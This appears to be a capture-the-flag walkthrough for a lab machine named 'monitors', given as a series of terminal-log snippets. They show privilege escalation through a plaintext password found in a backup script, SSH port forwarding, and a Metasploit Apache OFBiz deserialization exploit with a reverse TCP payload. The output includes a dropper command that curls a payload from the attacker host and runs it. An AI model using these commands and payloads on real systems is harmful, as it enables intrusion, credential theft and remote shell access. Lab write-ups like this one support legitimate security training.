This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@monitors:/usr/share/cacti/cacti$ find / -name user.txt 2>/dev/null | |
| /home/marcus/user.txt | |
| www-data@monitors:/usr/share/cacti/cacti$ ls -la /home/marcus/user.txt | |
| -r--r----- 1 root marcus 33 Sep 11 06:54 /home/marcus/user.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@monitors:/home/marcus$ ls -la | |
| total 40 | |
| drwxr-xr-x 5 marcus marcus 4096 Jan 25 2021 . | |
| drwxr-xr-x 3 root root 4096 Nov 10 2020 .. | |
| d--x--x--x 2 marcus marcus 4096 Nov 10 2020 .backup | |
| lrwxrwxrwx 1 root root 9 Nov 10 2020 .bash_history -> /dev/null | |
| -rw-r--r-- 1 marcus marcus 220 Apr 4 2018 .bash_logout | |
| -rw-r--r-- 1 marcus marcus 3771 Apr 4 2018 .bashrc | |
| drwx------ 2 marcus marcus 4096 Jan 25 2021 .cache | |
| drwx------ 3 marcus marcus 4096 Nov 10 2020 .gnupg |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@monitors:/etc$ cat /home/marcus/.backup/backup.sh | |
| #!/bin/bash | |
| backup_name="cacti_backup" | |
| config_pass="VerticalEdge2020" | |
| zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/* | |
| sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip | |
| rm /tmp/${backup_name}.zip |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@monitors:/etc$ cat /home/marcus/.backup/backup.sh | |
| #!/bin/bash | |
| backup_name="cacti_backup" | |
| config_pass="******************" | |
| zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/* | |
| sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip | |
| rm /tmp/${backup_name}.zip |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh [email protected] | |
| The authenticity of host '10.10.10.238 (10.10.10.238)' can't be established. | |
| ECDSA key fingerprint is SHA256:qcinAnoUyOFIv8VZ0yXCnFRNmzc6Zghh1VbQQD43abI. | |
| Are you sure you want to continue connecting (yes/no/[fingerprint])? yes | |
| Warning: Permanently added '10.10.10.238' (ECDSA) to the list of known hosts. | |
| [email protected]'s password: | |
| Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64) | |
| * Documentation: https://help.ubuntu.com | |
| * Management: https://landscape.canonical.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| marcus@monitors:~$ ifconfig | |
| br-968a1c1855aa: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 | |
| inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255 | |
| ether 02:42:57:73:aa:3e txqueuelen 0 (Ethernet) | |
| RX packets 0 bytes 0 (0.0 B) | |
| RX errors 0 dropped 0 overruns 0 frame 0 | |
| TX packets 0 bytes 0 (0.0 B) | |
| TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 | |
| docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| marcus@monitors:~$ netstat -tulnp | |
| (Not all processes could be identified, non-owned process info | |
| will not be shown, you would have to be root to see it all.) | |
| Active Internet connections (only servers) | |
| Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | |
| tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - | |
| tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - | |
| tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - | |
| tcp 0 0 '127.0.0.1:8443' 0.0.0.0:* LISTEN - | |
| tcp6 0 0 :::80 :::* LISTEN - |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh -L 8443:127.0.0.1:8443 [email protected] | |
| [email protected]'s password: | |
| Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64) | |
| * Documentation: https://help.ubuntu.com | |
| * Management: https://landscape.canonical.com | |
| * Support: https://ubuntu.com/advantage | |
| System information as of Sat Sep 11 07:21:21 UTC 2021 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1 | |
| rhosts => 127.0.0.1 | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 10.10.14.225 | |
| lhost => 10.10.14.225 | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 9001 | |
| lport => 9001 | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true | |
| forceexploit => true | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x64/shell/reverse_tcp | |
| payload => linux/x64/shell/reverse_tcp |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > run | |
| [*] Started reverse TCP handler on 10.10.14.225:9001 | |
| [*] Running automatic check ("set AutoCheck false" to disable) | |
| [!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation. | |
| [*] Executing Linux Dropper for linux/x64/shell/reverse_tcp | |
| [*] Using URL: http://0.0.0.0:8080/tz2phtuggSUl | |
| [*] Local IP: http://192.168.0.105:8080/tz2phtuggSUl | |
| [+] Successfully executed command: curl -so /tmp/XUuAnwnl http://10.10.14.225:8080/tz2phtuggSUl;chmod +x /tmp/XUuAnwnl;/tmp/XUuAnwnl;rm -f /tmp/XUuAnwnl | |
| [*] Command Stager progress - 100.00% done (117/117 bytes) |